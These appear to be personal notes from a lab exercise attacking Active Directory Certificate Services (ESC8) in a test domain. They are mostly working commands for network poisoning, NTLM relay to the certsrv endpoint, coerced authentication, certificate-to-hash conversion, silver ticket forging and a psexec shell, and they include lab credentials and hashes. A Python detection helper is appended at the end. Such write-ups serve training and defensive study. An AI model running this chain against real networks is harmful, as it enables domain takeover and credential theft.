Notes from an ADCS Attack Test


Adil 1 2025-09-23

1. Environment

  • DC: 172.16.119.3
  • SQL03: 172.16.119.80
  • backup01: 172.16.119.70

Reference links:

2. Exploitation

2.1 Method 2 (simplified)

  • Start poisoning
    • Prevent Responder from starting its SMB and HTTP servers: sed -i "s/SMB = On/SMB = Off/; s/HTTP = On/HTTP = Off/" Responder.conf
    • Poison the network: python3 Responder.py -I ens192


  • Create a machine account
    • ntlmrelayx.py -t ldap://172.16.119.3 -smb2support --no-da --no-acl --add-computer 'adil$' '@adil123456#'


  • Check whether the ADCS vulnerability exists:
    • certipy find -enabled -u 'adil$'@172.16.119.3 -p '@adil123456#' -stdout


  • Start the ADCS relay service
    • Note: the relay only fires after the coercion step below; that is when the machine account's certificate is obtained
    • certipy relay -target "http://172.16.119.3" -template Machine


  • Coerce the server to authenticate
    • Coercer coerce -t 172.16.119.70 -l 172.16.119.30 -u 'adil$' -p '@adil123456#' -d inlanefreight.local -v --always-continue


  • Use the certificate to obtain the machine account hash:
    • certipy auth -pfx backup01.pfx -dc-ip 172.16.119.3


  • Obtain the SIDs of domain objects
    • Note: the one we need here is the domain SID
    • lookupsid.py 'INLANEFREIGHT.LOCAL/backup01$'@172.16.119.3 -hashes :4167bb56243a273cf9dfa53c3ea859f0


  • Request a silver ticket
    • Required inputs: account hash, domain SID, machine name
    • ticketer.py -nthash 4167bb56243a273cf9dfa53c3ea859f0 -domain-sid S-1-5-21-1207890233-375443991-2397730614 -domain inlanefreight.local -spn cifs/backup01.inlanefreight.local Administrator


  • Edit the hosts file
    • vi /etc/hosts
    • Note: if the hosts file is not edited, using the ticket later fails with an error


  • Obtain a shell on the target host
    • KRB5CCNAME=Administrator.ccache psexec.py -k -no-pass backup01.inlanefreight.local


2.2 Method 1 (complex)

  • Exploitation this way is more cumbersome; only some of the commands used are recorded.
Force-enable WebDAV:
crackmapexec smb 172.16.119.3 -u adil$ -p '@adil123456#' -M drop-sc -o URL=https://172.16.119.20/testing FILENAME=@secret

crackmapexec smb 172.16.119.0/24 -u adil$ -p @adil123456# -M webdav

crackmapexec smb 172.16.117.0/24 -u adil$ -p '@adil123456#' --shares

# Coerce authentication:
python3 printerbug.py inlanefreight/adil$:'@adil123456#'@172.16.119.3 172.16.119.20

Coercer scan -t 172.16.119.70 -u 'adil$' -p '@adil123456#' -d inlanefreight.local -v

# ADCS-backup
crackmapexec ldap 172.16.119.0/24 -u 'adil$' -p '@adil123456#' -M adcs

crackmapexec ldap 172.16.119.3 -u adil$ -p '@adil123456#' -M adcs -o SERVER=INLANEFREIGHT-DC01-CA

certipy find -enabled -u 'adil$'@172.16.119.3 -p '@adil123456#' -stdout

curl -I http://172.16.119.3/certsrv/

sudo ntlmrelayx.py -t http://172.16.119.3/certsrv/certfnsh.asp -smb2support --adcs --template Machine

Coercer scan -t 172.16.119.70 -u 'adil$' -p '@adil123456#' -d inlanefreight.local -v

python3 gettgtpkinit.py -dc-ip 172.16.119.3 -cert-pfx ws01.pfx 'INLANEFREIGHT.LOCAL/BACKUP01$' BACKUP01.ccache

KRB5CCNAME=BACKUP01.ccache python3 getnthash.py 'INLANEFREIGHT.LOCAL/BACKUP01$' -key e637a8ea44a66d34c57a40b53179221904967f41193b664ad5eecc6304830925

Hash:
191d3107d6c73fd5dffb058757fe4e27

ticketer.py -nthash 191d3107d6c73fd5dffb058757fe4e27 -domain-sid S-1-5-21-1207890233-375443991-2397730614 -domain inlanefreight.local -spn cifs/backup01.inlanefreight.local Administrator

KRB5CCNAME=Administrator.ccache psexec.py -k -no-pass backup01.inlanefreight.local
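A defender-side companion to the `curl -I http://172.16.119.3/certsrv/` check above and to the relay in 2.1: this added Python example (not from the original post) judges a saved `curl -I` response for the precondition the ESC8 relay depends on, NTLM or Negotiate authentication offered by the web enrollment site over plain HTTP. The sample response below is constructed; 172.16.119.3 is the lab DC named on the page.

```python
"""Audit helper for an AD CS web-enrollment endpoint (/certsrv/).

The relay in this write-up works because IIS answers a plain-HTTP request
with an NTLM challenge. This module parses saved `curl -I` output and reports
whether that condition is present, so the check can run offline on captured
headers from your own CA.
"""
from urllib.parse import urlparse

# Constructed sample of `curl -I http://172.16.119.3/certsrv/` output
# (not captured from the lab in the post).
SAMPLE_CURL_HEAD = """HTTP/1.1 401 Unauthorized
Content-Type: text/html
Server: Microsoft-IIS/10.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
Date: Sun, 17 Dec 2023 10:42:20 GMT
Content-Length: 1293
"""


def parse_curl_head(text):
    """Split `curl -I` output into (status_code, {lowercased name: [values]})."""
    lines = [ln.strip() for ln in text.strip().splitlines() if ln.strip()]
    status = int(lines[0].split()[1])
    headers = {}
    for ln in lines[1:]:
        name, _, value = ln.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return status, headers


def assess_web_enrollment(url, status, headers):
    """Return a list of findings; an empty list means nothing ESC8-relevant was seen."""
    findings = []
    schemes = {v.split()[0].lower() for v in headers.get("www-authenticate", []) if v}
    ntlm_like = {"ntlm", "negotiate"} & schemes
    if status == 401 and ntlm_like and urlparse(url).scheme == "http":
        findings.append(
            "ESC8 exposure: web enrollment offers %s over plain HTTP; require HTTPS "
            "with Extended Protection for Authentication, or disable NTLM on the site"
            % "/".join(sorted(ntlm_like))
        )
    elif status == 401 and ntlm_like:
        findings.append(
            "HTTPS in use but NTLM/Negotiate still offered; confirm EPA (channel "
            "binding) is set to Required on the certsrv site"
        )
    return findings


if __name__ == "__main__":
    st, hd = parse_curl_head(SAMPLE_CURL_HEAD)
    for f in assess_web_enrollment("http://172.16.119.3/certsrv/", st, hd):
        print(f)
```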